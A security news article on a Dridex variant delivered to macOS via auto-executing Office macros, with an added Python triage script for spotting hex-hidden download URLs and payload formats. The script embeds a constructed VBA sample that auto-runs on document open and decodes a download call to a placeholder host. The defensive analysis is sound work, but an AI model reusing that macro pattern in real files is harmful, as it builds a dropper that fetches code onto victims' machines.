Researchers at Trend Micro have discovered a new variant of the Dridex banking malware that targets macOS users. It is delivered through documents embedded with malicious macros, including Word and Excel files.
The first sample appeared on VirusTotal in 2019, but detections peaked much later, in December 2022. However, the final payload is a Windows EXE file, which cannot run in a macOS environment. This led the researchers to believe that the variant is still in its testing stages and has not yet been fully adapted to macOS.
Additionally, the malware overwrites document files on the infected machine so that they carry these malicious macros. This suggests that further modifications could follow that make the payload compatible with macOS.
As for the malicious document itself, the affected .DOC file was first seen in 2015. It uses the ThisDocument object, which contains an auto-executing macro that in turn calls the malicious functions.
The macro code is only lightly obfuscated, with its strings stored as plain hexadecimal. It attempts to connect to a remote server to fetch additional payloads onto the target machine, including the aforementioned EXE file. The address of that remote server is further obfuscated using basic string encryption.
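The following is an added example, not code from the article or from Trend Micro, showing how an analyst could triage a dumped macro body for the two traits described above (an auto-executing handler and hex-encoded strings hiding a download URL) and then check whether a fetched payload is a Windows PE, as in this case, or a Mach-O that could actually run on macOS. The macro text and payload bytes are constructed samples written for this example; the helper name Hx and the URL example.invalid are placeholders, not the real Dridex macro.

```python
import re
from typing import Dict, List

# Constructed sample macro in the style the article describes: a
# ThisDocument auto-exec handler that decodes hex strings and downloads
# a file. Not the real Dridex macro; the URL is a placeholder.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
    Dim fn As String, u As String
    fn = Hx("55524c446f776e6c6f6164546f46696c65")
    u = Hx("687474703a2f2f6578616d706c652e696e76616c69642f62696e2f7061796c6f61642e657865")
    Call Run(fn, u)
End Sub

Private Function Hx(s As String) As String
    Dim i As Long, r As String
    For i = 1 To Len(s) Step 2
        r = r & Chr(CLng("&H" & Mid(s, i, 2)))
    Next i
    Hx = r
End Function
'''

# Constructed payload header: a PE ("MZ") stub, i.e. a Windows EXE.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"\x00" * 60

# Procedure names that Office runs without user interaction.
AUTOEXEC = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open",
            "Document_Close", "AutoClose", "AutoExec")
HEX_LITERAL = re.compile(r'"([0-9A-Fa-f]{8,})"')
URL = re.compile(r"https?://\S+", re.I)


def decode_hex_strings(macro: str) -> List[str]:
    """Decode quoted hex literals that turn into printable ASCII."""
    out = []
    for m in HEX_LITERAL.finditer(macro):
        h = m.group(1)
        if len(h) % 2:
            continue
        raw = bytes.fromhex(h)
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out


def triage_macro(macro: str) -> Dict[str, object]:
    """Flag auto-exec entry points and hex-hidden strings/URLs in VBA text."""
    decoded = decode_hex_strings(macro)
    triggers = [n for n in AUTOEXEC if re.search(r"\b" + n + r"\b", macro)]
    urls = [s for s in decoded if URL.match(s)]
    return {
        "autoexec": triggers,
        "decoded": decoded,
        "urls": urls,
        # auto-run plus a hidden URL is the combination worth escalating
        "suspicious": bool(triggers and urls),
    }


def classify_payload(blob: bytes) -> str:
    """Identify the executable format from its magic bytes."""
    if blob[:2] == b"MZ":
        return "pe"                      # Windows executable, will not run on macOS
    if blob[:4] in (b"\xfe\xed\xfa\xce", b"\xfe\xed\xfa\xcf",
                    b"\xce\xfa\xed\xfe", b"\xcf\xfa\xed\xfe"):
        return "macho"                   # 32/64-bit Mach-O, either endianness
    if blob[:4] == b"\xca\xfe\xba\xbe":
        return "macho-fat"               # universal binary (same magic as Java .class)
    if blob[:4] == b"\x7fELF":
        return "elf"
    return "unknown"


def runs_on_macos(blob: bytes) -> bool:
    return classify_payload(blob) in ("macho", "macho-fat")


if __name__ == "__main__":
    report = triage_macro(SAMPLE_MACRO)
    print(report)
    print(classify_payload(SAMPLE_PAYLOAD), runs_on_macos(SAMPLE_PAYLOAD))
```

In practice the macro text would come from a tool such as olevba from oletools rather than a string literal, and the payload bytes from the file the macro downloads; the point of the second check is that an MZ header on the fetched file is exactly why this variant is harmless on macOS today.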
Dridex is a long-running malware family that is still actively used in attacks against financial institutions. It started as a banking trojan that exclusively targeted Windows machines and has since evolved to include information-stealing and even botnet capabilities.
According to Check Point researchers, Dridex was the fourth most prevalent malware variant in 2021 and has continued to evolve, keeping itself relevant. It was also one of the most common malware families to abuse the Log4j vulnerability in December 2021.
While macOS users are safe for now, primarily because the malware's final payload cannot run on macOS, the fact that it can already deliver a payload to a Mac at all is concerning and could lead to further security issues down the road.